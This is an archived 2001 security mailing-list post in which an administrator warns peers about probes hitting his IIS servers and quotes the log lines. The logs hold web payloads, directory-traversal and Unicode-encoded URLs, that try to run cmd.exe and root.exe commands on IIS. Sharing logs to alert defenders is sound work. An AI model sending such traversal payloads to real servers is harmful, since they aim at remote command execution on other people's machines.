OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: John Howie (JHowieMSN.COM)
Date: Tue Sep 18 2001 - 13:33:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Folks,

    I have started seeing the following in my IIS logs, starting earlier today.
    I am getting hit constantly from various sources. I advise you to check your
    IIS boxes to see if you, or any of the servers you know, has been
    compromised.

    john...

    2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80
    GET /scripts/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
    GET /MSADC/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
    GET /c/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
    GET /d/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
    -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
    GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
    /c+dir 500 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
    GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
    /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
    GET
    /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe
    /c+dir 500 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 500
    -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
    GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
    GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
    -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
    -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
    -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
    GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500
    -

    _____________________________________________________________________
    ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net